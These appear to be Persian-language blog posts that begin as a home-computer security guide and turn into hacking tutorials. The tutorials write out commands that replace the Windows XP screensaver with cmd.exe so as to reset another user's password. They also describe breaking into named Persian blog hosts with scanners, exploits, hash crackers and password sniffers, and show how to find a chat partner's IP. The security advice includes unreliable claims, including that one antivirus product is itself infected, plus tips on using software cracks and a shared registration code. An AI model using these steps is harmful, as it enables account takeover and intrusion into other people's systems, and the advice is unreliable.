افزایش امنیت به میزان 80 درصد

 

به دلیل این که هر روز ترفندهای جدیدی برای ویروسی کردن و هک کردن کاربران کامپیوترهای شخصی به وجود می آید تصمیم گرفتم در این مقاله مطالبی را اراعه کنم که باعث افزایش 80 درصدی امنیت کامپیوتر شما می شود.

هر روزه شما هدف حمله ها و خطرهای بیشماری در اینترنت قرار می گیرید که از نظر تعداد می توان 95 تا از هر صد حمله را متوقف کرد ولی همین 5 خطر باعث کاهش امنیت به مقدار 20% می شوند چون این خطرها توسط افراد عادی و تازه کار نیست و عاملان آنها در کار خود بسیار تبهر دارند ، در اکثر موارد می توانند از تمام مرزهای امنیتی بگذرند و به طور کامل به مقصود خود برسند. {این حملات حدفمند هستند}

1: استفاده از یک نرم افزار ضد هکر با آخرین به روز رسانی ها که من Black ICe را پیشنهاد می کنم چون نیازهای کاربران حرفه ای و تازه کار را به طور کامل برطرف می کند. البته zone alarm که از ورژن 5 به بعد به ضد ویروس هم مجهز شده نیز انتخاب خوبیست ولی باید بدانید این نرم افزار نیاز به آموزش دارد {باید کتاب آموزشی آن که به تازگی منتشر شده خریداری کنید} و بیشتر برای کاربران حرفه ای طراحی شده و کاربران تازه کار نمی توانند از آن به درستی استفاده کنند.

2: استفاده از ویروس کشهای Norton Anti Virus 2004 و McAfee که اگر Pack کامل باشد خیلی بهتر است { پک کامل شامل Anti virus, Anti Spyware/Adware, Firewall, Anti spam, Security Center, Privacy Service می باشد}

توجه داشته باشید که نرم افزارهای فوق را از سایتهای اصلی آنها بگیرید و اقدام به خرید آنها نکنید ، چون اکثر شرکتهایی که سی دی های آنتی ویروس را جمع آوری می کنند اصلا به این نکته توجه نمی کنند که این برنامه ها باید از سایت اصلی باشند و در بسیاری از موارد نسخه های کرک شده و گاها ویروسی را از سایتهای غیر قانونی یا به اصطلاح Warez می گیرند و این خود باعث می شود که برنامه قابلیت های خود را از دست بدهد. من پیشنهاد می کنم نسخه های نمایشی یا زمان دار این برنامه ها را دانلود کنید و سپس با دادن سریال نامبر آنها را رجیستر کنید. پک کامل مربوط به شرکت Symantec به نام Norton Internet Security و پک کامل McAfee با نام Internet Security Suite عرضه می شود.

3: سطح ایمنی و ویروس کشی را در حالت High بگزارید تا تمام فایلها ، با هر پسوندی که هستند ویروس کشی شوند و توجه داشته باشید ویروس کش McAfee حالتی را با عنوان Heuristic دارد، که به معنی اکتشافی است و در این حالت ویروس کش، به طرز هوشمندانه ای اقدام به ویرس یابی می کند. توجه داشته باشید خیلی از ویروس هایی که در کامپیوتر شما پنهان شده اند به این روش آشکار می شوند. در حقیقت این نوع ویروس ها دو زیست هستند و مرتبا تغییر می کنند و از این رو ویروس کش، در حالت عادی نمی تواند آنها را بیابد.

4: Service Packهای ویندوز را دانلود کنید و همیشه ویندوز خود را به روز نگه دارید . البته با سرعت پایین اینترنت در ایران این کار عملا غیر ممکن است و به همین خاطر شما می توانید Service Pack 2 ویندوز را از طریق سی دی خریداری کنید.

5: تنظیمات صحیح خود سیستم عامل و عدم به اشتراک گذاری فایلها. این تنظیمات عبارتند از غیر فعال کردن NetBios و سرویس Remote Assistance و بستن مسیر ورودی کرم MsBlaster که حفره آن همیشه ممکن است خطر ساز باشد. به علت حجم بالای مقاله روش انجام این کارها نوشته نشده است ولی در صورت نیاز درخواست بگذارید.

6: عدم استفاده از برنامه های به اشتراک گذاری فایل از جمله Kazza که به علت نقص های بیشمار و همراه داشتن برنامه های جاسوسی استفاده از آن دیوانگی است.

7: عدم استفاده از Internet Explorer. خیلی از برنامه های جاسوسی و Trojanها فقط در صورتی دانلود و در نتیجه فعال می شوند که صفحه مربوطه توسط Internet Explorer باز شود، همچنین خیلی از کرمهای اینترنتی در صورت اجرا شدن و باز بودن اینترنت اکسپلورر گسترش پیدا می کنند. پیشنهاد می کنم از یک مرورگر دیگر به جای Internet Explorer استفاده کنید و قابلیت های PlugIn و Java Script آن را نیز غیر فعال کنید.

در این میان مرورگر Opera از همه کارآمد تر است.

8: افزایش امنیت Internet Explorer. با همه این احوال موقعیتی پیش می آید که باید از مرورگر استاندارد اینترنت یعنی Internet Explorer استفاده کنید به همین خاطر روش های افزایش امنیت Internet Explorer را نیز بیان می کنم.

cookieها را بعد از قطع شدن از اینترنت پاک کنید ، البته اگر مدت طولانی به اینترنت وصل بوده اید و در وبلاگ یا ایمیل خود وارد شده اید نیز حتما این کار را در حین کار با اینترنت نیز انجام دهید. در صورتی که به محتویات Temporary Internet Files نیاز ندارید آنها را هم پاک کنید، برای انجام این کارها مراخل زیر را دنبال کنید

Internet Explorer > Internet Option > Delete Cookie , Internet explorer > Internet Option > Delete Files...

8.1: جلوی کوکی هایی که می تونن خطرناک باشند را بگیریم. برای این کار مراحل زیر را طی کنید و حالت Medium High را انتخاب کنید

internet Explorer > Internet Option > {tab} Privacy

8.2: استفاده از برنامه های ضد پاپ آپ. خیلی از PopUp ها باعث قفل شدن و در نتیجه بسته شدن IE می شوند و حتی می توانند حاوی کدهای مخرب و ویروس نیز باشند.بهترین برنامه هایی که برای این کار وجود دارد Zero PopUp و AdWare 6.0 است ، البته Adware بسیار بهتر عمل می کند و علاوه بر قابلیت ضد Pop up قابلیت Anti spyware را نیز دارا می باشد.

8.3: پاک کردن و غیر فعال کردن ذخیره سازی پسورد توسط IE که پسورد وبلاگ و ایمیل را در IE ذخیره می کند و از این رو می تواند مورد سو استفاده هکرها قرار گیرد. برای انجام این کار مراحل زیر را طی کنید:

Internet Explorer > Internet Option > {tab} Content > Auto Complete و سپس دکمه Clear Password را می زنیم و بعد از آن تیک گزینه User Names & Passwords on Forms را بر می داریم.

صفحاتی که عکس یا عکسهای آنها نمایان نمی شود را Refresh نکنیم ، چون این یکی از روشهای آلوده سازی کامپیوتر قربانی به ویروس یا تروجان است و برای دیدن عکس مذبور روی آن کلیک راست بزنید و سپس گزینه Show Picture را بزنید. ممکن است سایتی حتی قسمتهای دیگرش نیز به درستی باز نشده باشد در این صورت نیز Refresh نکنید و آدرس آن سایت را در یک صفحه جدید IE وارد کنید.

8.4: استفاده از برنامه های ضد برنامه های جاسوسی یا همان Anti SpyWare و Anti AdWare که بهترین آنها Adware 6.0 و SpyHunter و SpySweeper می باشند و آنها را به ترتیب از سایتهای زیر می توانید دانلود کنید www.download.com و www.tooto.com و www.webattack.com

نکته: برنامه AdWare تنها اشکالی که دارد این است که باید ابتدا یک فایل کوچک را دانلود کنید و بعد از اجرای آن به طور خودکار برنامه اصلی که حجم زیادتری دارد دانلود می شود و شما نمی توانید آن را با برنامه های افزایش دهنده سرعت دانلود کنید و همچنین برنامه اصلی را در اختیار نخواهید داشت تا بعد از تعویض ویندوز دوباره آن را نصب کنید و هر بار که ویندوز نصب می کنید باید آن را دوباره دانلود کنید.

نکته2: برنامه SpySweeper یک برنامه بسیار عالی است که به دائما در حال بررسی کوکیه ها و دیگر برنامه های مخرب احتمالی است و به طور خودکار کوکی های خطرناک را پاک می کند. این برنامه دارای یک سکنر Spyware هم هست و مثل ویروس کش ها می تواند درایوهای هارد را بررسی کند ولی با این تفاوت که این برنامه به جای ویروس ، برنامه های جاسوسی را یافته و آنها را از بین می برد. تنها اشکالش هم این است که برنامه Dap که برای دریافت تبلیغات و رجیستر شدن مرتبا به سایتش مراجعه و اطلاعات ارسال می کند را به عنوان برنامه جاسوسی می شناسد و آن را پاک می کند.

نکته3: برنامه SpyHunter بیشتر به درد کاربران حرفه ای تر می خورد و خود کاربر باید جلوی فایلهایی را که به اینترنت وصل می شوند را با شناخت کافی که دارد بگیرد. این برنامه خیلی کم حجم قابلیت کنترل Spyware ها و کد های مخربی که در خود سایت قرار دارند{به صورت فایل جداگانه {server} نیستند} و با آن Load می شوند را دارد و همه آنها را به طور خودکار Block می کند. همچنین با کمک این برنامه می توانید ارسال اطلاعات توسط هر تروجانی را متوقف کنید و حتی بهترین آنتی ویروس ها هم ممکن است که یک تروجان جدید را نشناسند و این برنامه از این نظر بهترین انتخاب است.

برای درک بهتر ادامه می دهم که این نرم افزار فایلهایی را که اطلاعات ارسال می کنند را monitor کرده و به طور پیش فرض در لیست سبز قرار می دهد و شما می توانید فایل مورد نظر را در لیست قرمز قرار دهید، بدین ترتیب فایل مذکور بلوکه می شود. نکته جالبی که در اینجا نهفته است این است که می توانید فایل هایی نظیر Ie.exe یا dap.exe را در لیست قرمز قرار دهید تا امکان کار کردن با آنها میسر نباشد، البته بهتر است این برنامه را همراه برنامه های فوق به کارگیرید.

9: از چه سایتی برنامه Download می کنیم. ابتدا باید سایت مورد نظر را از آدرس فایلی که برای دانلود وجود دارد مورد بررسی قرار دهیم { مثلا www.tooto.com/spyhunter.zip را داریم و باید به سایت www.tooto.com برویم} و مطمئن شویم که برنامه مربوطه برای همین سایت است و هیچ وقت برنامه ها را از سایتهای ثالث نگیریم چون هیچ دلیل منطقی برای کار آنها وجود ندارد و بدون شک برنامه ای که ما از آنها می گیریم دارای ویروس یا تروجان است و این نکته باید بسیار مورد توجه شرکتهای رایت سی دی و سایتهایی باشد که برنامه برای دانلود معرفی می کنند . معمولا سایتهایی که برنامه های شرکتهای دیگر را برای دانلود می گذارند اسم های عجیب و غریب و طولانی دارند { این دو آدرس را مقایسه کنید : www.tooto.com/spyhunter.zip, www.aktami.cu.ne/pub~/spyhunter.zip}

یکی دیگر از مشخصه های سایتهایی که برنامه هایی که برای دانلود گذاشته اند مطعلق به خودشان نیست این است که آنها لیست های طویلی از برنامه های مختلف دارند که همگی آنها از همان {سایت}Domain و بدون توضیح و Preview وقسمت Help و از این جور چیزها می باشند، باید بدانید سایتی که برنامه خودش را برای دانلود گذاشته اولا تعداد محدودی برنامه دارد ، ثانیا برنامه را همراه Tutorial و Help و خیلی چیزهای دیگه معرفی می کنه و آدرس درست و حسابی داره ، همچنین در سایت اصلی برنامه، عکسها و Screen Shot هایی همراه با توضیحات اضافه از برنامه مورد نظر وجود دارد.

سایتهایی که آدرس آنها مثل IP هست بسیار خطرناکند و ممکن است Admin آن سایت با بدست آوردن IP شما که از طریق بازدید شما از آن سایت به دست او می رسد اقدام به هک کردن شما بکند یا همانطور که گفتم برنامه ای که در آن سایت برای دانلود قرار گرفته حاوی ویروس یا تروجان ... باشد. نمونه یک سایت و فایل خطرناک که آدرس آنها به جای domain آدرس IP می باشد: { IP حاوی چهار دسته عدد می باشد}

http://126.38.26.32.com/global.html , http://85.191.88.251.com/program.exe

حال ممکن است این سوال پیش بیاید که فلان برنامه دارای محدودیت زمانی یا عملکرد است و اگر ما آن برنامه را از این سایت اصلی دانلود کنیم چگونه می توانیم محدودیت آن را از بین ببریم و در جواب سوال شما باید بگویم که ابتدا نسخه Trial یا Demo برنامه را از سایت اصلی بگیرید و بعد از آن کرک آن برنامه را که حجم خیلی کمی هم دارد را از سایتهایی که برای این منظور می باشند دریافت کنید ، البته در موارد بسیار نادری اتفاق می افتد که کرک مربوطه حاوی ویروس است. ولی احتمال ویروسی شدن توسط آن خیلی کمتر از دریافت نسخه کامل کرک شده برنامه است و بهتر است از کرکهایی که شماره سریال در اختیار شما می گذارند استفاده کنید و کرکهایی که به جای فایل اصلی جایگزین می شوند خیلی مطمئن نیستند و حتی ممکن است از قابلیت برنامه بکاهند و برنامه انطور که می بایست کار نکند. خاطر نشان می کنم دریافت سریال برنامه هیچ خطری ندارد و مطمئن ترین راه کرک کردن نرم افزار است.

به سایت هایی که برنامه ها را کرک می کنند و آنها را برای دانلود می گذارند سایتهای Warez یا غیر قانونی می گویند. برای پیدا کردن سایت اصلی برنامه باید در گوگل به این صورت جستجو کنید :

Official Site + Name Of Program

( در قسمت Name of program باید نام برنامه مربوطه را بنویسید )

10: همیشه به آیکن و پسوند عکسهایی که از طریق چت می گیرید توجه کنید و از طرف مقابل بخواهید که عکسش را به ایمیلتان بفرستد چون خود یاهو دارای Norton Anti Virus می باشد و فایل قبل از دانلود شدن Scan می شود و فقط در مواردی نادر ممکن است Yahoo ویروسی که همراه عکس هست را نشناسد به همین خاطر عکس مربوطه را پس از download با ویروس کش McAfee نیز Scan کنید.

11: از کار انداختن System Restore . همانطور که می دانید فایلهایی که پسوند های سیستمی مثل dll , exe و غیره داشته باشند، پس از پاک کردن یا اعمال تغییرات در System Restore ذخیره می شوند و این مسئله زمانی خطر ساز می شود که یک فایل ویروسی را به صورت دستی یا به کمک برنامه های ضد ویروس یا ضد Spyware پاک{Delete} یا تمیز{Clean} کرده اید، ولی غافل از اینکه ویندوز این فایلها را در جایی دیگر حفظ کرده است و همچنان ویروس به فعالیت خود ادامه می دهد. برای از کار انداختن System Restore مراحل زیر را دنبال کنید:

Control Panel > System > {tab} System Restore > Turn off System Restore on All Drive

12: شاید زیاد اتفاق افتاده باشد که از طریق چت یا از یک سایت مشکوک عکس Download کرده باشید و نگرانید که این فایل حاوی تروجان یا ویروس مخصوص فایلهای JPG باشد و به همین خاطر عکس مربوطه را در کافی نت باز کنید و کلید F11 را بزنید و سپس کلید Print Screen را فشار دهید و بعد از آن برنامه Paint را باز کنید و Ctrl + V را بزنید و حالا می توانید عکس را با خیال راحت با هر پسوندی ذخیره کنید.

شاید بپرسید چرا برای این کار از برنامه های Picture Converator استفاده نکنیم و در جوابتان باید بگویم که ممکن است در فرایند تبدیل فایل ممکن است کدهای ویروس نیز ترجمه شده و همراه عکس Convert شده باقی بمانند ولی در روش فوق، فرایند تهیه عکس هیچ نیازی به عکس مشکوک به ویروس ندارد.

13 : هرگز اسم کامپیوتر {Computer Name} خود را واقعی ندهید. هکرها می توانند اسم کامپیوتر شما و در نتیجه اسم شما را بیابند و برای جلوگیری از این کار یک اسم مستعار برای خود انتخاب کنید. همچنین از وارد کردن اسم و مشخصات واقعی خود در برنامه هایی مثل Photoshop و غیره که در زمان نصب از شما اسم و مشخصات می خواهند نیز خودداری کنید.

14:تبدیل متون به عکس برای امنیت بیشتر

15: ویروس کش Panda را نصب نکنید چون فایل اصلی اجرایی آن ویروسی است و توسط ویروس کش معروف Iris شناخته می شود ولی چون ویروس کش iris ورژن جدید ندارد کاربران تازه کار با آن اشنایی ندارند ولی کاربرای قدیمی مثل خودم :-) این ویروس کش را به خوبی می شناسند. چند وقت پیش که می خواستم این ویروس کش را دانلود کنم در گوگل سرچ کردم ولی آن را پیدا نکردم و در عوض به مطلبی بر خوردم مبنی بر اینکه این ویروس کش 80% ویروس های ویندوز 95 و 98 را می شناسد ولی این ویروس کش در ویندوز ایکس پی اجرا نمی شود و ارزشش را دارد که یک ویندوز 98 نصب کنید با این ویروس کش یکبار کل هاردتون را Scan کنید، حداقل 2 یا 3 تا ویروس پیدا خواهد کرد. البته این ویروس کش را باید مثل McAfee در حالت Heuristic قرار دهید و شناسایی ویروس توسط این ویروس کش تا حد زیادی بستگی به تنظیمات صحیح دارد.

شرکتی که سی دی برگ سبز 4 را تولید کرده ویروس کش Iris را نیز درون این سی دی Application Collection قرار داده ولی با کمال تعصف این شرکت چون به تنظیمات درست این ویروس کش آشنا نبوده یک فایل ویروسی که در این سی دی وجود دارد را شناسایی نکرده و در حال حاظر فایلی که در این شاخه قرار دارد حاوی ویروس است.Amuse > Joke

به همین خاطر من فایل تنظیمات این ویروس کش را ذخیره کردم تا در اختیار کاربران عزیز قرار دهم ومی توانم آن را از طریق ایمیل برای شما ارسال کنم و به راحتی توسط Iris آن را Load کنید.

مهمترین و شاید خطرناک ترین ویروسی که تا کنون توسط هیچ ویروس کشی شناخته نشده است ویروس Win95.CIH است که فقط Iris آن را می شناسد و به شدت توسط سی دی و دیسکت در حال گسترش است و این ویروس کم کم درون کامپیوتر رخنه می کند ، تا جایی که تمام برنامه ها و فایلهای شما را آلوده می کند و از دلایلی که ممکن است شما به وجود ویروس در کامپیوترتان پی نبرید این است که فایلهایی که حاوی این ویروس هستند از کار نمی افتند و برنامه ها و فایلها کماکان اجرا می شوند {البته برنامه ها در حین اجرا دچار اشکالاتی می شوند} و این خود دلیل دیگری است که کاربران آن فایل را پاک نمی کنند و حتی آن را به دیگران نیز می دهند . بدون اقراق من آن را در کامپیوتر تمام دوستانم پیدا کردم و از تمام عزیزانی که این مقاله را می خوانند تقاظا دارم که کامپیوتر خود را توسط این ویروس کش Scan کنند تا این ویروس ریشه کن شود

در آخر هم باید بگم موفقیت یا عدم موفقیت ویروس کش iris بستگی به تنظیمات صحیح آن دارد.

هک کردن پاسورد ویندوز XP

۱-به Start > Run بروید و فرمان CMD را تایپ کرده Enter را بزنید.
۲-در پنجره ی باز شده این فرمان‌ها را بدون عیب و نقص اجرا کنید.

 cd .A

 cdwindowssystem32   .B

 mkdir hackpass   .C
copy logon.scr hackpass logon.scr   .D
 copy cmd.exe hackpass cmd.exe   .E
del logon.scr   .F

     rename cmd.exe logon.scr  .G

 exit   .H

با این کار در حقیقت پرامت داس را بجای Screen Saver به ویندوز معرفی می‌کنید و این کار، ویندوز را ناپایدار می‌کند.
فقط توصیه می‌کنم قسمت F و G را خیلی سریع انجام دهید، چون در غیر این صورت ویندوز با استفاده از سیستمی که فایل‌های مهم ویندوز را بازیابی میکند، تغییراتی که ایجاد کرده‌اید را بازسازی خواهد کرد.یعنی این دو خط دستور را باید در عرض کمتر 2 ثانیه انجام دهید.برای اینکار می‌توانید از Clip Board ویندوز کمک بگیرید، یعنی خط G را در Clip Board کپی کنید سپس خط F را اجرا کرده و بلافاصله بعد از آن، با کلیک راست کردن بر روی خط فرمان دستور خط G را Paste کرده سپس با زدن Enter اجرا کنید.
3-کامپیوتر را Restart نمایید.
4-Screen Saver ویندوز را فعال نمایید یا منتظر بمانید تا خود بخود اجرا شود.خواهید دید که، بجای Screen Saver، خط فرمان DOS ظاهر می‌شود.
5-اکنون اگر مثلا User name آن LORD بود و خواستید پسورد آن‌را به 222 تغییر دهید این فرمان را در پرامپت DOS انجام دهید:
Net user LORD 222
به این ترتیب پسورد به 222 تغییر خواهد یافت.
نکته: حتما بعد از پایان کار دو فایلی را که در پوشه‌ی hackpass کپی کرده‌اید به جای اصلی ‌آن برگردانید.

یکی از دوستان بهم گفت که اگه طرف گست نداشته باشه چی؟برنامه ای هم برای اینک کار وجود داره؟باید در جوابش بگم آره

برای دنلود برنامه اینجارو کلیک کنید دنلود   خوب این برنامه باید رجیستری شه این هم کدش : RE45844941494238586

آموزش هک کردن وبلاگ

چندتا از دوستان به من ایمیل زده بودند و گفته بودن که آموزش هک کردن وبلاگ را بده من هم گفتم چشم اما دوستان عزیز یادتان باشد من به طور صریح و واضح این آموزش را نمی دم علتش هم به دلیل مسایل امنیتی است.یکی از دوستان از من پرسیدند که تو چه نوع هکری هستی؟کلاه سیاه یا کاله سفید؟ در جواب ایشان باید بگم که من یک هکر کلاه سفید هستم چون دوست ندارم برم وبلاگ ها یا سایت های مردم را بی خود و بی جهت هک کنم به نظر من اگر می خواهید یک هکر کلاه سیاه خوب شوید باید از مسایلی که هکرهای کلاه سفید با آن سر و کار دارند سر در بیارید چون هکرهای کلاه سیاه((اون طوری که من با چندتاشون صحبت کردم))می گن ما فقط دنبال راه های نفوذ به سیستم ها هستیم و با مسایل ضد هک زیاد آشنایی نداریم اما هکرهای کلاه سفید هم نحوه ی هک کردن را می دانند و هم ضد هک که این کمک بسیار بزرگی برای آن هاست چون وقتی بخوان به یک سیستم نفوذ کنند اما حالا به هر دلیل اون روش نفوذی شان نگیره می فهمند که قربانی چه کارهای امنیتی کرده و ضد آن را می زنند یا از راه های دیگر اقدام می کنند (*سیاهکر*) البته هر هکر حرفه ای وقتی ببینه نمی شه با یه روش وارد شد قطعا روش دیگر رو امتحان می کنه اما در مسایل بزرگ و سرورهای بزرگتر و مهمتر شاید نتواند آن کار را کند که دلیل اصلی اش کمبود اطلاعاتش است

خوب امروز هم همینطوری که گفتم می خوام روش هک کردن یک وبلاگ به صورت کاملا حرفه ای نه بچه بازی که برای صاحب وبلاگ یه تروجان یا یهMagic-Ps بفرستیم بعد ببینیم که روشمون نگرفته و نا امید شیم.

آموزش هک کردن وبلاگ یا همان آموزش هک وبلاگ:(*سیاهکر*)

هک کدن یک وبلاگ به صورت حرفه ای کار چندان ساده ای نیست و مستلزم این است که شما با مفاهیم کلی شبکه و کار با نرم افزارهای , IP sniffer  NMAP , Nessus بلد باشید و بتوانید با Exploit ها کار کنید البته من نمی خواهم شما را از این کار نا امید کنم ولی بهتر است این نرم افزارها و چیزهایی را که گفتم بلد باشید

خوب ما برای هک کردن یک وبلاگ باید سرور و یا سرویس دهنده ی آن را اول هک کنیم تا بتوانیم رمزها و یوزرنیم های وبلاگ یا وبلاگ های تحت سرویس آن سرور را پیدا کنیم معمولا یوزر نیم ها و یا همان آدرس وبلاگ مثل:

http://www.victim.blogserver.com

که victim آدرس و یوزر نیم وبلاگ است کد بندی نشده است و به راحتی پس از نفوذ به سرویس دهنده ی وبلاگ می توانیم آن را پیدا کنیم اما پسوردها معمولا کدبندی شده اند و ما باید با استفاده از ابزارهای(*سیاهکر*) کرک پسورد،آن پسوردها را از حالت کد شده خارج کنیم که من در زیر اسم چندتا برنامه ی معروف کرک پسورد یا Password Cracker را گذاشته ام:

John the ripper

L0pht crack

Palm crack

که می توانید با جستجو در گوگل لینک دانلود آن ها را پیدا کنید و پس از دانلود از آن ها استفاده کنید که کار با آن ها بسیار آسان است بدین ترتیب که شما کلمه ی کد شده را به آن می دید و برنامه نسبت به اندازه ی ((Length)) آن شروع به شکست کد آن می نماید.یادتان باشد که L0pht crack بعد از حرف L صفر یعنی0 را دارد نه O

حالا ما چگونه به یک سرور وارد شویم؟

شما می توانید با پیدا کردن Vulnerability های یک سرویس دهنده ی وبلاگ به کمک برنامه های NAMP و یا Nessus و امتحان Exploit های نوشته شده برای آن آسیب پذیری ها ((Vulnerability))  به سیستم سرور نفوذ کرده و کنترل آن را در دست بگیرید البته این یادتان باشد که فقط به قسمت اطلاعات سرور که معمولا دارای آسیب پذیری است نفوذ کنید و به قسمت های دیگر به هیچ عنوان نوذ نکنید در ضمن این کار با هک کردن سایت فرق می کند اما روش های نزدیک به همی برای انجام هر دوی آن ها استفاده می شود

در این جا من نام چند سرویس دهنده ی وبلاگ های فارسی را از بیشترین آسیب پذیری به کمترین آسیب پذیری می نویسم:

1. Persianblog

2. Mihanblog

3. caspianblog

4. parsiblog

5. blogfa

6. persiangig

البته بلاگفا تا چند روز پیش در رده ی دوم قرار داشت اما به دلیل اخذ تدابیر امنیتی خوب در رده ی پنجم جای گرفت.البته من این رده بندی را براساس تعداد وبلاگ های هک شده ی آن سرور،تدابیر امنیتی اتخاذ شده ی آن سرور،تعداد دفعاتی که خودم به آن سرور نفوذ کرده ام و سوال از حدود 16 هکر انجا داده ام.

البته اگر این را برای شما سخت است(*سیاهکر*)من در پست بعد روش دیگری را که کمی آسان تر است را به شما می گویم.

خوب این هم از آموزش هک کردن وبلاگ قسمت اول.

یکی از دوستان پرسیده بودند که برنامه ی THC-scan 2.0 را ار سایت اصلی اش دانلود کرده ام  اما موقعی که روی برنامه کلیک می کنم صفحه ی سیاهی می یاد و بعدش می ره چه کار کنم؟

دوست عزیز من آسان ترین راه را به شما می گویم اول برنامه یعنی فایل .exe را به پوشه ی System 32  ویندوز خود ببرید و CMD را اجرا کرده و نام برنامه را که در زیر آیکون قرار دارد را در آن بنویسید و Enter کنید و پس از اجرا کار خود را انجام بدید.

آموزش هک کردن وبلاگ (2) و پاسخ به سوالات دوستان

از این که یه مدت آپدیت نکردم واقعا معذرت می خواهم.امروز یه روش دیگه برای هک کردن وبلاگ را به شما می  گویم.البته احتمال موفقیت این روش از روش قبلی کمتر هست.

آموزش هک کردن وبلاگ(2):

ما برای این کار نیاز به یک نرم افزار Sniffer داریم.شما می توانید با سرچ کردن عنوان:

Free IP Sniffer download

از یکی از سایت های پیدا شده آن را دانلود کنید.در اینترنت تعداد زیادی Sniffer وجود دارد که هریک کار خاصی را انجام می دهند البته این نکته را بگویم که آن ها خریدنی هستند و پس از مدتی از کار می افتند.من خودم هر چه قدر که دنبال یک سریال نامبر برای آن ها گشتم پیدا نکردم.ما برای این کار به IP Sniffer،Password Sniffer و Http Sniffer نیاز داریم.هنگامی که شما نرم افزارهای ذکر شده را دانلود کردید و اجرا کردید،باید یک آدرس آی پی در قسمت IP وارد کنید.این آی پی آدرس می تواند آی پی یک سرور وبلاگ یا هر صفحه ای که در آن رمز می زنند باشد((البته به غیر از یاهو و ایمیل های معتبر)).پس از این که آدرس آی پی را وارد کردید دکمه ی Listen را بزنید((اگر این دکمه نبود هر دکمه ای را که به نظر شما می تواند به آن آی پی آدرس وصل شود را بزنید)) اکنون برنامه تمامی پاکت های اطلاعاتی را که در آن لحظه بین Server و Client ردو بدل می شود را برداشته و تمامی مشخصات و محتوای آن ها را نشان می دهد البته اگر کد شده نباشند ولی بیشتر اوقات فقط پسورد کد شده است و یوزر یم و بقیه ی مشخصات به طور واضح مشخص هستند.البته با این روش شما دیگر نمی تواند یک وبلاگ مشخص را هک کنید بلکه تنها وبلاگ هایی را که مدیر آن ها در آن لحظه Log in کرده را می توانید هک کنید((بازهم به شرطی که پسورد و یوزر نیم را داشته باشید)).البته باز هم بگویم که احتمال موفقیت در این روش کمتر از روش قبلی است.

اینم از آموزش امروز.

پاسخ به سوالات دوستان:

سوال: یکی از دوستان گفته بودند که وبلاگم هک شده حالا من چه طوری می تونم اون رو پس بگیرم؟

جواب:دوستان عزیز شاید این سوال سوال بیشتر شما باشد که چگونه می توانیم وبلاگ هک شده را پس بگیریم؟

اگر .بلاگ شما مانند این نمونه

   http://www.hack1.blogfa.com

هک شده باشد شما می توانید به راحتی آن را پس بگیرید.برای این کار یکبار دیگه با یکی از روش هایی که گفتم وبلاگ خودتان را هک کنید.هکری که وبلاگ شما را هک کرده تنها پسورد آن را عوض کرده است.

اما اگر یک نفر وبلاگتان را هک کرد و هنگامی که به وبلاگ خود رفتید و یک صفحه ی سفید با آیکن ضریدری مثل این که یه عکس لود نشده باشه مواجه شدید و یا وبلاگتان همه چیزش در بر هم شده بود،امکان پس گرفتن آن وجود ندارد مگر این که از خود ادمین و مسئول سرور وبلاگ بخواهید تا او پسورد را برای شما بفرستد.

سوال:یکی از دوستان پرسیدند که:

میخواستم ازت این سوال رو داشته باشم که "وقتی از ip کلاینت صحبت می کنی
به valid یا invalid بودن اون توجه شده؟"

جواب:بله دوست عزیز.در این حالت منظور ما آی پی کسی هستش که valid هست.در غیر این صورت اصلا ما نمی توانیم کاری بکنیم چون آی پی Live نیست.در مورد سوال دومت منظور شما را درست متوجه نشدم اما اگر منظور شما این هستش که اگر یه نفر با پراکسی بیاد تو اینترنت ما نتونیم ردش رو بگیریم و آی پی اصلی اش هم مخفی می مونه باید بگم بله همینطور هستش.وقتی یک نفر از پراکسی استفاده می کنه یه همچین ارتباطی به وجود می آد:

Client-->Proxy Servet-->Internet

پس اگر مثلا آی پی ما 127.0.0.1 باشه و آی پی سرور پراکسی هم 217.145.158.250 باشه  اگر کسی از تو اینترنت بخواد دنبال ما بگرده به جای آدرس آی پی اصلی باید آی پی سرور پراکسی را وارد کنه.همان طور هم که می دونید نفوذ به پراکسی کاری خنده دار و وقت تلف کردنه چون چیز خاصی در پراکسی وجود نداره

در مورد آموزش ساب سون که چندتا از دوستان خواسته بودند هم بعدا براشون می ذارم و در مورد دعت نامه ی پرشین گیگ هم بعدا صحبت می کنیم.

من به احتمال خیلی زیاد دیگه در www.iranddl.com  و در بخش forum آن مطلب می نویسم به نشانی http://www.iranddl.com/modules.php?name=Forumsشوید و درباره ی مسایل مربوط به هک و هکینگ با هم گفتگو کنیم.من هم آموزش هایم را در آن جا می نوسیم.البته قطعی شدن این کار هنوز معلوم نیست ولی احتمالش خیلی زیاده و نتیجه ی قطعی را در پست بعد می نویسم.به همین دلیل نیز می خواهم یک دستیار انتخاب کنم.دوستانی که مایل هستند تا با من کار کنند،مجموعه ای از فعالیت های خودشون را در مورد هک و هکینگ برای من بفرستند؛همچنین میزان آشنایی با هک و ضد هک را هم بگویید.

پیداکردن IP در یاهو مسنجر

می خوام در مورد یافتن IP صحبت کنم. در این جلسه یک مثال ساده از یافتن IP در هنگام CHAT خواهیم دید و همینطور بعدها خواهیم دید که چطور می شود فهمید کسی آنلاین هست یا خیر و در درسهای بعد در مورد یافتن IP برای Server ها گپی می زنیم. پیدا کردن IP افراد (کامپیوترهائی غیر از Server ) دستور Netstatاز دستور netstat میتوان برای monitor کردن پورتها استفاده نمود. برای اجرا از فرمان dos rompt (مانند درس اول) استفاده می کنیم. و در صفحه داس Netstat را تایپ کرده و اجرا می کنیم. تحلیل نتایج: در ستون {Porto} اطلاعاتی مربوط به نوع پورت را می بینید (مانند: TCP/UDP) در {Local Address} آىپى داخلى و یا اسم میزبان: پورت باز ) را می بینید. در {Foreign Address} را خواهید دید که به شما IP و Hostname را در این فرمت نشان میدهد: IP:Port در ستون {State} ، حالت connection را می بینیم که اگر وصل باشد = Established یا تماس waiting = Listening حال با توجه به تئوری بالا ، بدست آوردن پورتهاى باز را شروع میکنیم : پیداکردن IP در برنامه Yahoo Messenger (من چون با Yahoo Messenger دعوای خونوادگی دارم از این شروع می کنم.) می خواهیم درباره یک کلاینت مثلا کسی که مثل شما یک اتصال مثلا dial-up به اینترنت دارد و فرضا دارد با شما chat می کند، اطلاعاتی بدست آوریم. در این مورد هم اولین چیز و مهمترین آن، Ip اوست. وقتی با یک نفر از طریق yahoo messenger به صورت Pm چت می کنید، در اعلان داس تایت می کنیم: netstat -n تحلیل نتایج : سطری را پیدا کنید که دارای عبارت Local Address یا Foreign Address بوده و به پورت 5101 اشاره می کند.(یا شبیه آن) Ip طرف مقابل را از ستون Foreign Address از همین سطر پیدا می کنیم. اگر در مثال بالا بجای netstat -n ، از netstat استفاده کنیم، می بینیم که Ip ها به معادل های اسمی تبدیل شده 